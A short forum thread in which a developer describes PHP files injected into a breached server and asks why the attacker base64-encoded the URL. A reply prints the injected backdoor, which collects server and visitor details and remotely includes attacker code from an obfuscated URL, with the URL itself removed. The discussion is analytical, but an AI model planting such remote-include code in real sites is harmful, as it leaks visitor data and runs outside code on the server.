Recently a server that I did some work on was breached and two PHP files added to a directory.
The contents of these files were different but both completed the same task - they gathered various $_SERVER info and then included from a russian url with the info in the get var's.
Anyway - the one thing that struck me was the script kiddies use of base64_encode() to 'mask' the url?!
The last bit puzzled me somewhat.. was this a weak attempt at obscurification, or is there some other reason (perhaps fooling include/require/php into thinking it is not actually including over http - not likely I would have thought) ?
A Q about someone's code injection..
Moderator: General Moderators
- Buddha443556
- Forum Regular
- Posts: 873
- Joined: Fri Mar 19, 2004 1:51 pm
- Maugrim_The_Reaper
- DevNet Master
- Posts: 2704
- Joined: Tue Nov 02, 2004 5:43 am
- Location: Ireland
It's the url to a ruski site along with the info collected from $_SERVER, this is what was injected into one of the files, nothing malicious here, but obviously we don't know what is in the include's:
Where /* removed */ was the url broken into two and 64 encoded. (The if challenge has two different URL's)
Code: Select all
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode(/* removed */).base64_decode(/* removed */)."/?".$str))){} else {include(base64_decode(/* removed */).base64_decode(/* removed */)."/?".$str);} ?>